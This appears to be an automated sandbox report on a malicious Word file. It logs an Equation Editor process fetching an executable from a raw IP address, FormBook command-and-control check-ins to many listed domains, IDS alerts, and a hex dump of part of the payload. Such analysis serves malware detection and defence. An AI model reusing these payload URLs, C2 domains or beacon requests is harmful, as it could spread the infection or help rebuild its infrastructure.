      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163

      Networking

      Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49163
      Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49163
      Source: Network trafficSuricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49163
      Source: C:\Windows\explorer.exeDomain query: www.launchyouglobal.com
      Source: C:\Windows\explorer.exeDomain query: www.ko-or-a-news.com
      Source: C:\Windows\explorer.exeNetwork Connect: 68.66.226.117 80
      Source: C:\Windows\explorer.exeDomain query: www.affirmationtotebags.com
      Source: C:\Windows\explorer.exeDomain query: www.education2jobs.com
      Source: C:\Windows\explorer.exeDomain query: www.thecareskin.com
      Source: C:\Windows\explorer.exeDomain query: www.opmk.monster
      Source: C:\Windows\explorer.exeNetwork Connect: 13.248.213.45 80
      Source: C:\Windows\explorer.exeDomain query: www.mbbwa4wp.cfd
      Source: C:\Windows\explorer.exeDomain query: www.fcno30.com
      Source: C:\Windows\explorer.exeDomain query: www.lifeofthobes.uk
      Source: Malware configuration extractorURLs: www.lifeofthobes.uk/btrd/
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:37:29 GMTContent-Type: application/x-msdos-programContent-Length: 662016Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 02:32:29 GMTETag: "a1a00-625a88369ea83"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 64 9a 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 09 00 00 1a 00 00 00 00 00 00 e2 1d 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 1d 0a 00 4f 00 00 00 00 20 0a 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 fd 09 00 00 20 00 00 00 fe 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 20 0a 00 00 18 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0a 00 00 02 00 00 00 18 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 1d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 c0 44 09 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05
      Source: global trafficHTTP traffic detected: GET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1Host: www.thecareskin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1Host: www.fcno30.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 13.248.213.45 13.248.213.45
      Source: Joe Sandbox ViewIP Address: 87.120.84.38 87.120.84.38
      Source: Joe Sandbox ViewIP Address: 68.66.226.117 68.66.226.117
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
      Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
      Source: global trafficHTTP traffic detected: GET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDDF82 getaddrinfo,setsockopt,recv,9_2_08CDDF82
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7B21753-11AB-4008-8617-6E8AEEEB606B}.tmp
      Source: global trafficHTTP traffic detected: GET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1Host: www.thecareskin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1Host: www.fcno30.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficDNS traffic detected: DNS query: www.education2jobs.com
      Source: global trafficDNS traffic detected: DNS query: www.lifeofthobes.uk
      Source: global trafficDNS traffic detected: DNS query: www.thecareskin.com
      Source: global trafficDNS traffic detected: DNS query: www.opmk.monster
      Source: global trafficDNS traffic detected: DNS query: www.affirmationtotebags.com
      Source: global trafficDNS traffic detected: DNS query: www.mbbwa4wp.cfd
      Source: global trafficDNS traffic detected: DNS query: www.fcno30.com
      Source: global trafficDNS traffic detected: DNS query: www.ko-or-a-news.com
      Source: global trafficDNS traffic detected: DNS query: www.launchyouglobal.com
      Source: global trafficDNS traffic detected: DNS query: www.trygenesisx.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 30 Oct 2024 07:40:34 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 
30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exe
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exeC:
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exej
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exettC:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
      Source: ihbgfbin.exe, 00000005.00000002.421951115.0000000002524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com/btrd/www.mbbwa4wp.cfd
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.comReferer:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com/btrd/www.solarcyborg.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com/btrd/www.lifeofthobes.uk
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com/btrd/www.ko-or-a-news.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com/btrd/www.docemimocasamentos.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com/btrd/www.nashexshop.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com/btrd/www.launchyouglobal.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com/btrd/www.trygenesisx.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk/btrd/www.thecareskin.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.ukReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/www.affirmationtotebags.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.websiteReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd/btrd/www.fcno30.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfdReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com/btrd/www.gynlkj.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster/btrd/www.martline.website
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monsterReferer:
      Source: explorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
